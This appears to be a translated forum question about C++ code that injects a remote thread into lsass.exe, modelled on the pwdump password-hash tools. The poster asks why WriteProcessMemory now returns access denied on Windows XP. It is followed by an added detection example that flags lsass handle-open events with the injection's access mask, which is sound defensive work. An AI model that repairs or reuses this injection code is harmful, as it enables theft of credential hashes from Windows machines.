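I have a program that remotely injects into Lsass.exe. It used to work, but now WriteProcessMemory fails with: Access denied. I have enabled the SE_DEBUG_NAME privilege for my own process, and even elevated to system32 privileges. Part of the code follows: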
// Provisional size of the thread body: 10 KB
const DWORD THREADSIZE=1024*10;
HANDLE lsasshWnd=::OpenProcess(PROCESS_CREATE_THREAD|PROCESS_VM_OPERATION|PROCESS_VM_WRITE,
                               FALSE,
                               GetLsassPID()); // process ID
if(lsasshWnd==NULL)
{
    printf("打开进程错%d:%s\n",GetLastError(),GetErrorCode(GetLastError()));
    return;
}
DWORD ReAddr = NULL;
// Allocate memory in the remote process for the thread body
void * ThreadAddr=::VirtualAllocEx(lsasshWnd,
                                   0,
                                   THREADSIZE,
                                   MEM_COMMIT|MEM_RESERVE,
                                   PAGE_EXECUTE_READWRITE);
if(ThreadAddr==NULL)
{
    printf("分配远程进程内存失败%d:%s\n",GetLastError(),GetErrorCode(GetLastError()));
    return;
}
printf("远程线程地址:%08X\n",ThreadAddr);
DWORD dwOldProtect = 0;
if(!::VirtualProtectEx(lsasshWnd,ThreadAddr,1024*10,PAGE_EXECUTE_READWRITE,&dwOldProtect))
{
    // Format string fixed: it had a stray "d:" and one argument too many
    printf("VirtualProtectEx失败%d:%s\n",GetLastError(),GetErrorCode(GetLastError()));
    return;
}
// Write the thread body into the remote process
if(!::WriteProcessMemory(lsasshWnd,ThreadAddr,&ThreadProc,THREADSIZE,0))
{
    printf("写远程进程%08X错%d:%s\n",ThreadAddr,GetLastError(),GetErrorCode(GetLastError()));
    return;
}
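This is where it fails. It used to work. Is it because XP was upgraded to SP3? This code was written based on pwdump3 or pwdump4, I forget which. Now LC5 cannot inject successfully either. How can this be solved?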
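
For defenders, the access mask requested in the post (PROCESS_CREATE_THREAD|PROCESS_VM_OPERATION|PROCESS_VM_WRITE, 0x002A) is itself a detection signal when the target is lsass.exe. The following is an added example, not part of the original post: it classifies handle-open events by granted access, and the AccessEvent record, its field names and the sample events are assumptions constructed for illustration.

```cpp
#include <cctype>
#include <cstdint>
#include <cstdio>
#include <string>

// Documented Win32 process access rights (values from winnt.h).
constexpr uint32_t kCreateThread = 0x0002;  // PROCESS_CREATE_THREAD
constexpr uint32_t kVmOperation  = 0x0008;  // PROCESS_VM_OPERATION
constexpr uint32_t kVmRead       = 0x0010;  // PROCESS_VM_READ
constexpr uint32_t kVmWrite      = 0x0020;  // PROCESS_VM_WRITE
// The mask the posted code passes to OpenProcess: 0x002A.
constexpr uint32_t kPostedMask = kCreateThread | kVmOperation | kVmWrite;

enum class Verdict { Ignore, MemoryRead, RemoteThreadWrite };

// Hypothetical telemetry record; the field names are assumptions.
struct AccessEvent { std::string source, target; uint32_t granted; };

// Case-insensitive match on the final path component.
static bool is_lsass(const std::string& path) {
    std::string base = path.substr(path.find_last_of("\\/") + 1);
    for (char& c : base) c = (char)std::tolower((unsigned char)c);
    return base == "lsass.exe";
}

// Names of the tracked rights present in a mask, joined with '|'.
std::string describe(uint32_t mask) {
    static const struct { uint32_t bit; const char* name; } kRights[] = {
        {kCreateThread, "CREATE_THREAD"}, {kVmOperation, "VM_OPERATION"},
        {kVmRead, "VM_READ"}, {kVmWrite, "VM_WRITE"}};
    std::string out;
    for (const auto& r : kRights)
        if (mask & r.bit) out += (out.empty() ? "" : "|") + std::string(r.name);
    return out;
}

// Supersets of the posted mask (e.g. PROCESS_ALL_ACCESS) also match.
Verdict classify(const AccessEvent& ev) {
    if (!is_lsass(ev.target)) return Verdict::Ignore;
    if ((ev.granted & kPostedMask) == kPostedMask) return Verdict::RemoteThreadWrite;
    return (ev.granted & kVmRead) ? Verdict::MemoryRead : Verdict::Ignore;
}

// Constructed sample events, not taken from any real log.
const AccessEvent kSamples[] = {
    {"C:\\tools\\sample.exe", "C:\\WINDOWS\\system32\\lsass.exe", 0x002A},
    {"C:\\WINDOWS\\system32\\svchost.exe", "C:\\WINDOWS\\system32\\lsass.exe", 0x1000},
    {"C:\\tools\\sample.exe", "C:\\WINDOWS\\system32\\LSASS.EXE", 0x1410},
    {"C:\\tools\\sample.exe", "C:\\WINDOWS\\notepad.exe", 0x1F0FFF}};

int main() {
    for (const auto& ev : kSamples)
        std::printf("%-36s 0x%06X %-36s verdict=%d\n", ev.source.c_str(),
                    (unsigned)ev.granted, describe(ev.granted).c_str(), (int)classify(ev));
}
```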